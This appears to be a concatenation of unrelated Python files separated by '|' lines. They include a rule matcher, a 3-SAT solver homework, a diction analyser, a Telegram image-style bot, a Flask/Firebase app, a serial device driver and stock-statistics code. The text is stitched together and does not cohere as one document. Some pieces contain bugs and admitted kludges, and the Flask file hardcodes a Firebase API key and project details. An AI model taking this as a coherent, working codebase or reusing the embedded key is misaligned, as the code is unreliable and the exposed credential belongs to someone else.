self.AM.reset_state(state)
is_accept = False
while not is_accept and self.AM.has_next():
ele = self.AM.get_next()
#if self.get_word_dist(ele[0]) > self.conf.max_match_dist:
# break
new_tp = "%s#%s"%(tp, ele.tag)
if new_tp in fingerprint:
self.AM.accept(ele)
is_accept = True
new_matched_eles = matched_eles + ((ele.start, ele.end), )
# simple
if fingerprint[new_tp].isLeaf():
best_ans.append(MatchedItem(new_tp, new_matched_eles, fingerprint[new_tp].match_list))
stack.append((new_tp, self.AM.get_state(), new_matched_eles ))
return best_ans
# 特殊规则逐条匹配; 这种规则多了会影响速度, 只做特殊用途
# plus可能是指数式复杂度, 但其在语义匹配需求中使用场景不多,大多采用贪心匹配足已
# 为了最大化性能, plus采用贪心匹配
def special_preprocess(self, dialog):
special_post = {}
_, post = self.special_atom_extract(dialog)
special_post.update(post)
for pname, trie in self.rule_trie.special_tries:
conf_names = self.rule_info.config.get(pname, [])
rule_tp = self.rule_info.get_rule_type(pname)
base_tp = "plus" if rule_tp == "PLUS" else "search"
conf = config.get_confs(conf_names, base_tp)
matched_items = self._greed_match(trie, conf)
if matched_items:
for m in matched_items: m.cal_match_score(dialog)
if rule_tp == "PLUS":
all_plus, post = self.plus_extract(matched_items, pname, conf, special_post)
else:
all_plus, post = self.special_rule_extract(matched_items, pname, conf, special_post)
if all_plus:
special_post.update(post)
self.AM.matched.extend(all_plus)
self.AM.sorted()
return special_post
def special_atom_extract(self, dialog):
special_atoms = self.rule_info.get_special_atoms()
post = {}
if not special_atoms:
return [], post
for ele in self.AM.matched:
if ele.tag in special_atoms:
slot_indexes, pfunc, _ = self.rule_info.get(ele.tag)
idx_slot_map = {0: dialog[ele.start: ele.end+1]}
slots = apply_post(slot_indexes, pfunc, idx_slot_map)
if "__MATCH__" not in slots or slots["__MATCH__"] == True:
post[(ele.tag, ele.start, ele.end)] = slots
else:
self.AM.matched.remove(ele)
return [], post
## 合法性判断, 后处理
def special_rule_extract(self, lst, rname, conf, special_post):
tags, post = [], {}
for c in lst:
_, slices, perm = c.tnodes[0]
slot_indexes, pfunc, _ = self.rule_info.get(rname)
if slot_indexes or pfunc:
idx_slot_map = get_idx_slot(slices, perm, c.fragments, special_post)
slots = apply_post(slot_indexes, pfunc, idx_slot_map)
if "__MATCH__" not in slots or slots["__MATCH__"] == True:
post[(rname, c.begin, c.end)] = slots
tags.append(AcMatchedGroup(c.begin, c.end, rname, "3"))
else:
tags.append(AcMatchedGroup(c.begin, c.end, rname, "3"))
return tags, post
def plus_extract(self, lst, tag, conf, special_post):
ans, post = [], {}
if not lst: return ans, post
item = lst[0]
i, cnt = 1, 1
while i < len(lst):
dist = lst[i].begin - item.end
end_flag = False
if dist <= 0:
end_flag = conf["no_cover"]
i += 1
elif dist <= conf["max_dist"] + 1 and cnt < conf["max_N"]:
item.concat(lst[i])
cnt += 1
i += 1
else:
end_flag = True
if cnt >= conf["min_N"] and end_flag:
frags, _ = trans_by_post(item.fragments, special_post)
post[(tag, item.begin, item.end)] = {"__OUT__": "".join(frags)}
ans.append(AcMatchedGroup(item.begin, item.end, tag, "2"))
if end_flag:
if i < len(lst):
item = lst[i]
cnt = 1
i += 1
else:
item = None
if cnt >= conf["min_N"] and item is not None:
frags, _ = trans_by_post(item.fragments, special_post)
post[(tag, item.begin, item.end)] = {"__OUT__": "".join(frags)}
ans.append(AcMatchedGroup(item.begin, item.end, tag, "2"))
return ans, post
|
-X FMLP -Q 0 -L 2 97 400
-X FMLP -Q 0 -L 2 95 400
-X FMLP -Q 0 -L 2 89 400
-X FMLP -Q 0 -L 2 82 250
-X FMLP -Q 0 -L 2 56 175
-X FMLP -Q 1 -L 1 45 200
-X FMLP -Q 1 -L 1 42 300
-X FMLP -Q 1 -L 1 39 400
-X FMLP -Q 1 -L 1 36 400
-X FMLP -Q 2 -L 1 32 250
-X FMLP -Q 2 -L 1 31 400
-X FMLP -Q 2 -L 1 23 150
-X FMLP -Q 2 -L 1 20 100
-X FMLP -Q 3 -L 1 20 175
-X FMLP -Q 3 -L 1 19 100
-X FMLP -Q 3 -L 1 13 100
-X FMLP -Q 3 -L 1 10 100
|
# Write a function solve_3SAT using the search-tree technique outlined
# below that takes as its input a 3-SAT instance (see Problem Set 2),
# applies pre-processing (see Problem Set 4), and then uses a search tree
# to find if the given instance has a satisfying assignment. Your function
# should return None if the given instance of 3SAT has no satisfying
# assignment and otherwise return a satisfying assignment.
# Take any clause that is not satisfied
# * If all variables have already been set, then there is no
# possible solution anymore
# * Otherwise, branch into at most three cases where in each case a different
# variable is set so that the clause becomes satisfied:
# - The first variable is set so that clause becomes satisfied
# (and we don't do anything with the other variables)
# - The first variable is set so that clause does not becomes satisfied,
# the second one is set so that it becomes satisfied and we don't do
# anything with the third variable.
# - The first and second variable are set so that the clause does not
# become satisfied, the third one is set so that it does become satisfed.
# Note that any solution must fall into one of the above categories.
# Naturally, after having applied the pre-processing and also during the
# branching, some clauses will not contain three unassigned variables anymore
# and your program needs to account for that.
# You may write any additional functions you require to solve this problem.
def solve_3SAT(num_variables, clauses):
assignment = [None] * (num_variables + 1) # index 0 is dummy
assignment[0] = 0
clauses_pp = sat_preprocessing(num_variables, clauses, assignment)
# print clauses_pp
general_assignment = recursive_solve_3SAT(num_variables, clauses_pp, assignment)
if general_assignment == None:
return general_assignment
else:
for i in range(len(general_assignment)):
if general_assignment[i] == None:
general_assignment[i] = 0
return general_assignment
# depth = 0
from copy import *
def recursive_solve_3SAT(num_variables, clauses, ori_assignment): # doesn't use num_variables
# assert num_variables == len(assignment) - 1
assignment = deepcopy(ori_assignment)
take_any_clause = first_unsat_clause(clauses, assignment)
# global depth
# depth = depth + 1
if not take_any_clause:
return assignment
# else check if no possible solution
a=[None]*3
for j in range(3):
a[j] = assignment[abs(take_any_clause[j])]
if a[0]!=None and a[1]!=None and a[2]!=None:
return None
# otherwise branch into at most 3 cases
u = abs(take_any_clause[0])
v = abs(take_any_clause[1])
w = abs(take_any_clause[2])
can_do = what_branch(take_any_clause, assignment)
if (can_do[0]):
# print " " * depth, "b1", take_any_clause, assignment[u], assignment[v], assignment[w], "SET", u
##
if take_any_clause[0] > 0:
assignment[u] = 1 # could simplify as a[u]=int(c[0]>1)
elif take_any_clause[0] < 0:
assignment[u] = 0
##
result = recursive_solve_3SAT(num_variables, clauses, assignment)
# depth -= 1
if result != None:
return result
# print " " * depth, "failed all b1"
# FIXME some stuff on reset assignment??
else:
# print " " * depth, "b1 NO", take_any_clause, assignment[u], assignment[v], assignment[w]
pass
if (can_do[1]):
# print " " * depth, "b2", "SET", u, v
##
if take_any_clause[0] > 0:
assignment[u] = 0
elif take_any_clause[0] < 0:
assignment[u] = 1
if take_any_clause[1] > 0:
assignment[v] = 1
elif take_any_clause[1] < 0:
assignment[v] = 0
##
result = recursive_solve_3SAT(num_variables, clauses, assignment)
# depth -= 1
if result != None:
return result
else:
# print " " * depth, "b2 NO"
pass
if (can_do[2]):
# print " " * depth, "b3", "SET", u, v, w
##
if take_any_clause[0] > 0:
assignment[u] = 0
elif take_any_clause[0] < 0:
assignment[u] = 1
if take_any_clause[1] > 0:
assignment[v] = 0
elif take_any_clause[1] < 0:
assignment[v] = 1
if take_any_clause[2] > 0:
assignment[w] = 1
elif take_any_clause[2] < 0:
assignment[w] = 0
##
result = recursive_solve_3SAT(num_variables, clauses, assignment)
# depth -= 1
if result != None:
return result
else:
# print " " * depth, "b3 NO"
pass
return None
def first_unsat_clause(clauses, assignment):
for i in range(len(clauses)):
if not is_satisfied(clauses[i], assignment):
return clauses[i]
return []
def what_branch(clause, assignment):
literals = len(clause)
assert literals == 3
doable=[False]*literals
a=[None]*literals
for j in range(literals):
a[j] = assignment[abs(clause[j])]
if clause[j]<0 and a[j] != None:
a[j] = not a[j]
if a[0]==True or a[0]==None:
doable[0]=True
if (a[0]==False or a[0]==None) and (a[1]==True or a[1]==None):
doable[1]=True
if (a[0]==False or a[0]==None) and (a[1]==False or a[1]==None) and (a[2]==True or a[2]==None):
doable[2]=True
return doable
###########################
def is_satisfied(clause, assignment): # takes a single clause
for j in range(len(clause)):
if assignment[abs(clause[j])] == None:
# return False # This is tricky tricky logic! What is your definition of ANY CLAUSE THAT IS NOT SATISFIED ?
continue
if clause[j] > 0 and assignment[abs(clause[j])] == True:
return True
if clause[j] < 0 and assignment[abs(clause[j])] == False:
return True
return False # falls thru to here if we have only 0 or None, and no 1.
######## PREPROCESSOR
from copy import *
def rule1(assignment, clauses): # If a clause has only 1 var, var must be true.
for row in clauses:
if len(row)==1:
assignment[abs(row[0])] = (row[0] > 0)
return assignment
def rule2(assignment, clauses): # If a var occurs only once, easy to set to true.
occurrences = [0] * (len(assignment)) # 0 means 0. 1 or -1 means 1. 2 means 2+.
for row in clauses:# count up occurrences in prep for rule 2
for term in row:
if occurrences[abs(term)] > 1:
continue
elif abs(occurrences[abs(term)]) == 1:
occurrences[abs(term)] = 2 # occurs > 1 time
elif occurrences[abs(term)] == 0 and assignment[abs(term)]==None:
occurrences[abs(term)] = abs(term)/term # 1 or -1 if exactly 1 time
for var_num in range(1,len(occurrences)): # modify assignment for any vars occurring 1 X.
if abs(occurrences[var_num])==1 and assignment[var_num]==None:
assignment[var_num] = (occurrences[var_num] > 0)
return assignment
def rule3(assignment, clauses): # Remove any satisfied clauses.
for i in range(len(clauses)):
for j in range(len(clauses[i])):
if clauses[i] == "sat":
continue
if assignment[abs(clauses[i][j])]==True and clauses[i][j] > 0:
clauses[i] = "sat" # don't delete right away or it screws up index counting
elif assignment[abs(clauses[i][j])]==False and clauses[i][j] < 0:
clauses[i] = "sat"
while "sat" in clauses:
clauses.remove("sat")
return clauses
def rule4(assignment, clauses): # Remove any FALSE variables.
for var_num in range(1,len(assignment)):
if assignment[var_num] == None:
continue
elif assignment[var_num] == False:
val_to_remove = 1 * var_num
elif assignment[var_num] == True:
val_to_remove = -1 * var_num
for row in clauses:
while val_to_remove in row:
row.remove(val_to_remove)
if row == []:
return "FAIL"
return clauses
def sat_preprocessing(num_variables, clauses, assignment):
# print "****"
oa=0
oc=0
while not (oa==assignment and oc==clauses): # (oa[1:len(oa)] == assignment[1:len(assignment)])
oa=deepcopy(assignment)
oc=deepcopy(clauses)
# print
# print "ini: a=", assignment[1:len(assignment)], "c=", clauses
assignment=rule1(assignment, clauses)
# print "pr1: a=", assignment[1:len(assignment)], "c=", clauses
assignment=rule2(assignment, clauses)
# print "pr2: a=", assignment[1:len(assignment)], "c=", clauses
clauses=rule3(assignment, clauses)
# print "pr3: a=", assignment[1:len(assignment)], "c=", clauses
clauses=rule4(assignment, clauses)
if clauses=="FAIL":
return [[1],[-1]] # FIXME. Stupid kludge to pass class. Technically it should be [[1],[-1]]
# print "pr4: a=", assignment[1:len(assignment)], "c=", clauses
return clauses
####################
def test():
clauses = [[-2, -3, -1], [3, -2, 1], [-3, 2, 1],
[2, -3, -1], [3, -2, 1], [3, -2, 1]]
solutions = [[0, 0, 0, 0],
[0, 0, 1, 1],
[0, 1, 0, 0],
[0, 1, 1, 0],
[1, 0, 0, 0],
[1, 0, 1, 1],
[1, 1, 0, 0],
[1, 1, 1, 0]]
assert solve_3SAT(3,clauses) in solutions
clauses = [[2, 1, 3], [-2, -1, 3], [-2, 3, -1], [-2, -1, 3],
[2, 3, 1], [-1, 3, -2], [-3, 2, 1], [1, -3, -2],
[-2, -1, 3], [1, -2, -3], [-2, -1, 3], [-1, -2, -3],
[3, -2, 1], [2, 1, 3], [-3, -1, 2], [-3, -2, 1],
[-1, 3, -2], [1, 2, -3], [-3, -1, 2], [2, -1, 3]]
assert solve_3SAT(3,clauses) == None
print 'Tests passed'
# test()
######### MY TESTS
clauses1 = [[-2, -3, -1], [3, -2, 1], [-3, 2, 1],
[2, -3, -1], [3, -2, 1], [3, -2, 1]]
clauses2 = [[2, 1, 3], [-2, -1, 3], [-2, 3, -1], [-2, -1, 3],
[2, 3, 1], [-1, 3, -2], [-3, 2, 1], [1, -3, -2],
[-2, -1, 3], [1, -2, -3], [-2, -1, 3], [-1, -2, -3],
[3, -2, 1], [2, 1, 3], [-3, -1, 2], [-3, -2, 1],
[-1, 3, -2], [1, 2, -3], [-3, -1, 2], [2, -1, 3]]
w1 = [[-15, -4, 14], [-7, -4, 13], [-2, 18, 11], [-12, -11, -6],
[7, 17, 4], [4, 6, 13], [-15, -9, -14], [14, -4, 8], [12, -5, -8],
[6, -5, -2], [8, -9, 10], [-15, -11, -12], [12, 16, 17],
[17, -9, -12], [-12, -4, 11], [-18, 17, -9], [-10, -12, -11],
[-7, 15, 2], [2, 15, 17], [-15, -7, 10], [1, -15, 11],
[-13, -1, -6], [-7, -11, 2], [-5, 1, 15], [-14, -13, 18],
[14, 12, -1], [18, -16, 9], [5, -11, -13], [-6, 10, -16],
[-2, 1, 4], [-4, -11, 8], [-8, 18, 1], [-2, 15, -13],
[-15, -12, -10], [-18, -14, -6], [1, -17, 10], [10, -13, 2],
[2, 17, -3], [14, 1, -17], [-16, -2, -11], [16, 7, 15],
[-10, -6, 16], [4, -5, 10], [8, 10, -12], [1, -9, -14],
[18, -9, 11], [16, 7, 12], [-5, -14, -13], [1, 18, 5], [11, 16, 5],
[-8, 12, -2], [-6, -2, -13], [18, 16, 7], [-3, 9, -13], [-1, 3, 12],
[-10, 7, 3], [-15, -6, -1], [-1, -7, -3], [1, 5, 13], [7, 6, -9],
[1, -4, 3], [6, 8, 1], [12, 14, -8], [12, 5, -13], [-12, 15, 9],
[-17, -8, 3], [17, -6, 8], [-3, -14, 4]]
w2=[[15, 4, -3], [-14, -15, 5], [-19, -16, 17], [7, 18, -5], [-14, -16, 12],
[-16, -9, 18], [9, 16, 4], [-10, 18, 5], [-11, 4, 2], [-6, -12, -16],
[12, 3, 5], [-1, -12, -18], [8, -15, 11], [-1, 5, 13], [-10, -4, -15],
[-17, 1, -15], [3, 12, 17], [17, 2, 19], [7, 1, -17], [9, 15, -19],
[-8, 2, -16], [7, -2, 17], [-3, 11, -6], [-11, 10, -3], [15, -13, -3],
[5, -16, -9], [8, 15, 11], [12, 14, -18], [12, -8, 19], [-15, 4, -8],
[8, 9, -1], [-17, -12, -18], [-2, -3, 8], [-3, 4, -1], [15, 2, 19],
[-3, -8, -6], [12, 17, 2], [-11, 12, 1], [12, -9, -8], [-7, -14, 2],
[10, 14, -11], [-2, 17, 14], [-17, 15, 1], [19, 2, 7], [18, -16, -7],
[-7, -1, 13], [1, 19, -7], [18, 2, -3], [15, -3, 1], [10, 14, -12],
[15, -3, -2], [1, -18, -2], [18, -3, -13], [2, 16, 6], [10, -5, -15],
[-13, -1, -16], [-4, -6, -11], [-15, 4, 1], [-12, -16, 5], [-10, 4, -2],
[-10, 1, 6], [-3, 13, -19], [5, -8, -11], [11, 6, -12], [7, 15, -8],
[6, 1, -5], [-7, 1, -19], [18, -4, -7], [6, 16, 5], [-8, 19, 2],
[13, 4, 11], [-10, -13, -19], [1, 19, 12], [-5, 17, 14], [-5, 1, -7],
[-6, 13, -11], [18, -10, -12], [-7, -8, 12], [2, -5, 8], [-14, -15, 16],
[13, -6, -7], [15, 14, -1], [14, -2, 3], [18, 15, 5], [3, -8, -19],
[-3, -11, -6], [10, 12, -17], [2, -12, 1], [-8, -9, -19], [-11, 17, 5],
[-18, -3, 8], [-17, -8, -12]]
# w2 [0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0]
# w1 [0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0] MASTER
# w1 [0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0] FIX_1118
print "solving"
x=solve_3SAT(19,w2)
print x
print
|
'''
Author: Jane Wharton
Company: Geek Sources, Inc.
diction.py:
This module is designed to analyze the diction of a text and return
a value representing its "uniqueness" or how common the words it
contains are when compared against the databases stored in the
wordfreq library.
Example use of TriteWords.test for assertions / debug:
debug print statement example
cls.test("found word: {}!".format(word))
assertion example
cls.test("type(word) is str: ",
statement=(type(word) is str), assertion=True
)
'''
import spacy # pip install spacy
import contextualSpellCheck # spacy
#import json
import wordfreq # pip install wordfreq
from jtest import Test
class TriteWords:
cutoff_rare = 2
cutoff_uncommon = 4
cutoff_trite = 5
weight_unique = 50
weight_rare = 10
weight_uncommon = 1
weight_trite = -5
weight_common = 0
## _NUMSETS = 3
## _words=[set() for _ in range(_NUMSETS)]
@classmethod
def setCutoffRare(cls, value): cls.cutoff_rare = value
@classmethod
def setCutoffUncommon(cls, value): cls.cutoff_uncommon = value
@classmethod
def setCutoffTrite(cls, value): cls.cutoff_trite = value
@classmethod
def getFreq(cls, word:str):
Test.test("type(word) is str: ", statement=(type(word) is str))
return cls._getFreq(word)
@classmethod
def _getFreq(cls, word:str):
return wordfreq.zipf_frequency(word, "en")
@classmethod
def analyze(cls, wordList: list):
''' size of cutoffs should be 1 less than _NUMSETS at maximum,
because the last cutoff is just anything left over. '''
cnt_unique = 0
cnt_rare = 0
cnt_uncommon = 0
cnt_trite = 0
cnt_common = 0
for word in wordList:
Test.test("type(word) is str: ",
statement=(type(word) is str)
)
## ''' find word in our sets if possible, before using wordfreq '''
## for i in range(cls._NUMSETS):
## if word in cls.words[i]:
## Test.test("found word index {}: {}!".format(i, word))
## cnt[i] += 1
## break
##
## else:
## index = cls._NUMSETS - 1
freq = cls._getFreq(word)
if freq==0:
cnt_unique += 1
elif freq<=cls.cutoff_rare:
cnt_rare += 1
elif freq<=cls.cutoff_uncommon:
cnt_uncommon += 1
elif freq<=cls.cutoff_trite:
cnt_trite += 1
else:
cnt_common += 1
## for i in range(len(cutoffs)):
## if (freq > 0 and freq <= cutoffs[i]):
## index = i
## break
## cls.words[index].add(word)
return (cnt_unique, cnt_rare, cnt_uncommon, cnt_trite, cnt_common,)
@classmethod
def printAnalysis(cls, wordList: list):
uni,rar,unc,tri,com = cls.analyze(wordList)
print("unique words: ", uni)
print("rare words: ", rar)
print("uncommon words: ", unc)
print("trite words: ", tri)
print("common words: ", com)
# end class
if __name__=="__main__":
#print("a" in {"w":1})
TriteWords.enableDebugMode()
TriteWords.enableAssertions()
TriteWords.printAnalysis([
"developer", "develop", "developed", "developing",
"team"
])
TriteWords.printAnalysis([
"worked", "work", "working", "do", "doing"
])
TriteWords.printAnalysis([
"dandy", "dandelion", "dander", "dan",
])
# end if
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 12 15:05:57 2021
@author: useren
"""
import logging
from aiogram import Bot, executor, types
from aiogram.dispatcher import Dispatcher
#from aiogram.dispatcher.webhook import SendMessage
from aiogram.contrib.middlewares.logging import LoggingMiddleware
from aiogram.utils.executor import start_webhook
from aiohttp import ClientSession
import aiogram
from aiogram.types import ReplyKeyboardRemove, \
ReplyKeyboardMarkup, KeyboardButton, \
InlineKeyboardMarkup, InlineKeyboardButton
from urllib.parse import urljoin
from PIL import Image
import io
import os
#os.environ['KMP_DUPLICATE_LIB_OK']='TRUE'
from inference import JohnsonMultiStyleNet, make_style
import torch
DEVICE = torch.device('cpu')
style_num = 11
style_model = JohnsonMultiStyleNet(style_num)
style_model.eval()
webhook_using = False
if os.name == 'posix':
webhook_using = True
API_TOKEN = os.getenv('API_TOKEN','123213:SDFSDGSD_ASDKKDF')
else:
with open('API.TOKEN', 'r') as f:
API_TOKEN = f.readline().split()[0]
#webhook setting
WEBHOOK_HOST = 'https://telegabot67.heroku.com'
WEBHOOK_PATH = '/webhook/'+API_TOKEN
WEBHOOK_URL = urljoin(WEBHOOK_HOST, WEBHOOK_PATH)
#print(f'wh_url=\n{WEBHOOK_URL}, type({type(WEBHOOK_URL)}) ?\n{WEBHOOK_HOST + WEBHOOK_PATH}')
#webapp setting
if webhook_using:
WEBAPP_HOST = '0.0.0.0'
WEBAPP_PORT = os.getenv('PORT')
print(WEBAPP_PORT)
# Configure logging
logging.basicConfig(level=logging.INFO)
# Initialize bot and dispatcher
bot = Bot(token=API_TOKEN)
dp = Dispatcher(bot)
if webhook_using:
dp.middleware.setup(LoggingMiddleware())
async def on_startup(dp):
logging.warning('++++starting webhook')
await bot.delete_webhook()
await bot.set_webhook(WEBHOOK_URL)
async def on_shutdown(dp):
logging.warning('+++Shutting down...')
await bot.delete_webhook()
await dp.storage.close()
await dp.storage.wait_closed()
logging.warning('+++Bye-bye!')
@dp.message_handler(commands=['start', 'help'])
async def send_welcome(message: types.Message):
await message.reply(f"Hi!\nI'm EchoBot!\nos.name={os.name}")
@dp.message_handler()
async def echo(message: types.Message):
mes_to_answ = ''
mes_to_answ += ' date: ' + str(message.date)
#await message.answer(mes_to_answ)
#assert False, f'{message.text}'
img = Image.open('test.jpg')
#style_choice = 0
fp = io.BytesIO()
Image.fromarray(make_style(img, style_model)).save(fp, 'JPEG')
await bot.send_photo(message.from_user.id, fp.getvalue(),
reply_to_message_id=message.message_id)
@dp.message_handler(content_types=['photo'])
async def photo_reply(message: types.Message):
fpin = io.BytesIO()
fpout = io.BytesIO()
await message.answer('I got your photo, wait for stylization...')
await message.photo[-1].download(fpin)
style_num = None
if message.text:
style_txt = [word for word in message.text.split() if word.is_digits()]
if style_txt:
style_num = int(style_txt[0]) % style_model.get_style_number()
img = Image.open(fpin)
styled = make_style(img, style_model, style_num)
Image.fromarray(styled).save(fpout, 'JPEG')
#fid=message.photo[-1].file_id
#print(fid)
await bot.send_photo(message.from_user.id, fpout.getvalue(),
reply_to_message_id=message.message_id)
#def test(img, style_choice=0):
#img = Image.open(r'test.jpg')
#plt.imshow(img)
# img_t = transform_inference(img).unsqueeze(0)
# with torch.no_grad():
# styled = style_model(img_t, style_choice)
# return recover_image(styled.detach().cpu().numpy())[0]
if __name__ == '__main__':
if webhook_using:
logging.warning(f'---->trying start webhook:{WEBHOOK_PATH}, {WEBAPP_HOST}, {WEBAPP_PORT}')
start_webhook(dispatcher=dp,
webhook_path=WEBHOOK_PATH,
on_startup=on_startup,
on_shutdown=on_shutdown,
skip_updates=True,
host=WEBAPP_HOST,
port=WEBAPP_PORT)
else:
executor.start_polling(dp, skip_updates=True)
|
from astropy.io import ascii
import numpy as np
#rc3=ascii.read("/Users/dhk/work/cat/NGC_IC/myrc3.dat")
irac1_gals=[]
cnt=0
for x in range(0,14):
data=ascii.read("/Users/dhk/work/cat/NGC_IC/SHA_mosaic_quarry_result_%d.tbl" % (x),format='ipac')
tmp=""
for y in range(0,len(data)):
if data[y][10] == 'IRAC1':
# if y == 0 and data[y][0].upper() in rc3['name']:
if tmp == "" :
tmp=data[y][0]
cnt=cnt+1
irac1_gals.append(tmp)
elif data[y][0] != tmp:
tmp=data[y][0]
cnt=cnt+1
irac1_gals.append(tmp)
print(cnt)
thefile = open('irac1_gals.txt','w')
for item in irac1_gals:
thefile.write("%s\n" % item)
|
import networkx as nx
import community
import numpy as np
import pyrebase
from flask import *
import json
#import firebase_admin
#from firebase_admin import credentials
#cred = credentials.Certificate("key.json")
#firebase_admin.initialize_app(cred)
config = {
"apiKey": "AIzaSyA7N3W1eqC00CnLi4KZtIly-z5PD3fWDDo",
"authDomain": "rejoelusion.firebaseapp.com",
"databaseURL": "https://rejoelusion.firebaseio.com",
"projectId": "rejoelusion",
"storageBucket": "rejoelusion.appspot.com",
"messagingSenderId": "981870293946",
"appId": "1:981870293946:web:23a62d3fdac5ca2e89a383",
"measurementId": "G-E7N4B5JGCP"
}
firebase = pyrebase.initialize_app (config)
db = firebase.database()
all_users = db.child("Users").get()
for user in all_users.each():
#print(user.key())
#print(user.val())
#python_dict = json.dumps(str(user.val()))
#print(python_dict)
if user.val() is not None:
#hereeeeee to
print(user.val()["ami"])
app = Flask(__name__)
@app.route("/")
def hello_world():
return "Welcome to PACT 4.2 Drink'O'Neccted!"
@app.route('/community')
def count_community():
return jsonify(louvain())
def louvain():
matrix = np.zeros( (10, 10) )
for i in range (len(matrix)):
for j in range(len(matrix)):
matrix[i, i] = 0 #can't be friend with yourself
matrix[i, j] = np.random.randint(low=0, high=2) #randomly be friends with someone else
graphPACT = nx.Graph()
for i in range (len(matrix)):
for j in range(len(matrix)):
if(matrix[i,j] == 1):
graphPACT.add_edges_from([(i, j)])
#first compute the best partition
partitionPACT = community.best_partition(graphPACT)
for k in partitionPACT :
if k is 2 :
kom = '{"User": '+str(k)+', "Community": '+str(partitionPACT[k])+'}'
return kom
|
class MissingColumnAssembler:
def populate(self, dto):
result = {}
for table in dto.sourceTables:
if table in dto.excludedTables:
continue
if table in dto.missingTables:
continue
sourceColumns = dto.sourceInspector.get_columns(table)
destColumns = dto.destInspector.get_columns(table)
missingColumns = self._missingColumns(sourceColumns, destColumns)
if missingColumns:
result[table] = missingColumns
dto.missingColumns = result
def _missingColumns(self, sourceColumns, destColumns):
missingColumns = []
for sourceColumn in sourceColumns:
destColumnExists = self._columnExist(sourceColumn['name'], destColumns)
if not destColumnExists:
missingColumns.append(sourceColumn['name'])
return missingColumns
def _columnExist(self, columnName, columns):
for column in columns:
if columnName != column['name']:
continue
return column
return False
|
import time
import serial
class LockBox(object):
def __init__(self,comPort='com13'):
try:
self.ser = ser = serial.Serial()
ser.port = comPort
ser.timeout = 5
ser.setDTR(False)
ser.open()
except serial.serialutil.SerialException:
#no serial connection
self.ser = None
else:
pass
def __del__(self):
if self.ser:
self.ser.close()
def send(self, command):
self.ser.write(command+"\r\n")
def query(self, command):
self.send(command)
time.sleep(0.020)
return self.ser.readline()[:-2]
@property
def lock(self):
return bool(int(self.query("LOCK?")))
@lock.setter
def lock(self,state):
if state:
self.send("ON")
else: self.send("OFF")
if __name__=='__main__':
lockBox = LockBox() |
import time
import math
import statistics as stats
import market.parser as parser
'''
@summary: This method goes through every symbols and obtains the following indicators for the time period and interval: Beta, Sharpe ratio, year low, year high, ...
@param symbolsList: An array of symbols i.e. ['BB.TO', 'SIO.V', ...]
@param fromDate: Format should be [month, day, year]
@param toDate: Format should be [month, day, year]
@param interval: d -> day, w -> week
@return: i.e. {"BB.TO": [<beta>, <Sharpe ratio>, <year low>, <year high>], ...}
'''
def getStatsForSymbols(symbolsList, fromDate, toDate, interval='d'):
result = {}
for symb in symbolsList:
print("Getting data for " + symb)
dp = parser.YahooDataProvider(1, symb, parser.BASE_URL_YAHOO_EOD, fromDate, toDate, interval)
eodData = dp.getEODData()
dp = parser.YahooDataProvider(0, symb, parser.BASE_URL_YAHOO_INTRADAY,
{"year_low":parser.YahooDataProvider.YAHOO_QUOTE_PROPERTY_MAP["year_low"],
"year_high":parser.YahooDataProvider.YAHOO_QUOTE_PROPERTY_MAP["year_high"]})
intradayInfo = dp.getIntraDayData()
# Get the indicators
print("Getting indicators for " + symb)
tmxSymb = parser.convertFromYahooToTMXSymbol(symb)
beta = parser.extractBetaForSymbol(parser.BASE_URL_TMX, tmxSymb, parser.REGEX1_FOR_BETA_FROM_TMX, parser.REGEX2_FOR_BETA_FROM_TMX)
sharpeRatio = 'NaN'
if (len(eodData) > 0 and len(eodData['Adj Close']) >= 3):
sharpeRatio = calculateSharpeRatio(eodData['Adj Close'], 0)
yearLow = intradayInfo["year_low"]
yearHigh = intradayInfo["year_high"]
# Put all the data in result
result[symb] = {"Beta": beta, "Sharpe_Ratio": sharpeRatio, "Year_Low": yearLow, "Year_High": yearHigh}
# Don't hit the server too often too fast
time.sleep(2)
print(result)
return result
def calculateSharpeRatio(inputPrices, riskFreeRate, k=250):
# First calculate return
returns = []
for i in range(1, len(inputPrices)):
singleReturn = float(inputPrices[i])/float(inputPrices[i-1]) - 1
returns.append(singleReturn)
# Find mean and std
meanReturn = stats.mean(returns)
stdOfReturn = stats.stdev(returns)
# Calculate the Sharpe ratio using formula:
if (stdOfReturn == 'NaN' or stdOfReturn == 0):
return 'NaN'
theSharpeRatio = math.sqrt(k) * ((meanReturn - riskFreeRate)/stdOfReturn)
return theSharpeRatio
def getStatsForSymbolsOnPage(url, regex1, regex2, fromDate, toDate, interval='d'):
print('Calling extractSymbolsFromWebsite')
symbols = parser.extractSymbolsFromWebsite(url, regex1, regex2, '.V')
print(symbols)
retResult = getStatsForSymbols(symbols, fromDate.split(','), toDate.split(','), interval)
return retResult
|
alpha = 9
print("a= ",alpha)
beta = alpha + 10
alpha = 4
charlie = 23 + beta
alpha = 70
print("a= ",alpha)
print("beta: ", beta)
print(charlie)
exit
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import absolute_import
import ast
import os
import subprocess
def check_celery_task_func_def_changed():
result = subprocess.run(["git", "diff", "master", "--name-only"], capture_output=True, text=True)
filenames = result.stdout.split('\n')
for filename in filenames:
if not filename.endswith('tasks.py'):
continue
if filename.endswith('.py'):
_check_celery_task_file(filename)
def _check_celery_task_file(filename):
print(filename)
r = open(os.path.abspath(filename), 'r')
tree = ast.parse(r.read())
func_name_changed = []
task_def_changed = _get_func_names_which_changed()
for stmt in ast.walk(tree):
if not isinstance(stmt, ast.FunctionDef):
continue
for decorator in stmt.decorator_list:
if (
isinstance(decorator.func, ast.Name)
and decorator.func.id in ['task', 'periodic_task']
and stmt.name in task_def_changed
):
func_name_changed.append(stmt.name)
if func_name_changed:
return func_name_changed
def _get_func_names_which_changed():
"""
Command:
git diff --color=always | grep 'def' | cut -d " " -f2 | cut -d "(" -f1 | sort | uniq
Output:
["func_name_1", "func_name_2"]
"""
git_diff = subprocess.run(['git', 'diff'], check=True, capture_output=True)
func_names = subprocess.run(['grep', 'def'], input=git_diff.stdout, capture_output=True)
git_diff = subprocess.run(['git', 'diff', '--color=always'], check=True, capture_output=True)
func_names = subprocess.run(['grep', 'def'], input=git_diff.stdout, capture_output=True)
